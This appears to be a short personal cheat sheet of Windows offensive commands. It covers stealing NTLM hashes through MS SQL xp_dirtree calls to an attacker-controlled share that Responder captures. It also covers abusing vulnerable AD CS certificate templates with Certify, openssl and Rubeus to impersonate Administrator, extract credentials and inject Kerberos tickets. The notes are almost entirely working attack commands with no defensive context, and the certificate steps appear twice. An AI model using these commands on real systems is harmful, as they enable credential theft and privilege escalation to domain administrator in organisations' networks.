Windows
So just random notes and shell comands to do stuff
MS SQL
Stealing NTLM hash
need one of this permission
EXEC sp_helprotect 'xp_dirtree';
EXEC sp_helprotect 'xp_fileexist';
EXEC sp_helprotect 'xp_subdirs';
Then:
xp_dirtree '\\IP_ADDR\ANY`
After that responder should catch NTLM hash
Vulnerable certificates
.\Certify.exe find /vulnerable
- this finds any vulnerable template.\Certify.exe request /ca:<copy from output above> /template:<name of tempate> /altname:<user to impersonate>
Copy PEM certificate and convert it with:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
.\rubues.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
Copy NTLM hash and PassTheHash
.\rubues.exe asktgt /user:Administrator /certificate:cert.pfx /ptt
should inject kerberos ticket to current session but it wont always work
1. .\Certify.exe find /vulnerable - this finds any vulnerable tempalte
2. .\Certify.exe request /ca:<copy from output above> /template:<name of template> /altname:<user to impersonate>
3. Copy PEM certificate and convert it with openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
4. .\rubues.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials
5. Copy NTLM hash and PassTheHash
5.5 .\rubues.exe asktgt /user:Administrator /certificate:cert.pfx /ptt should inject kerberos ticket to current session but it wont always work
Last updated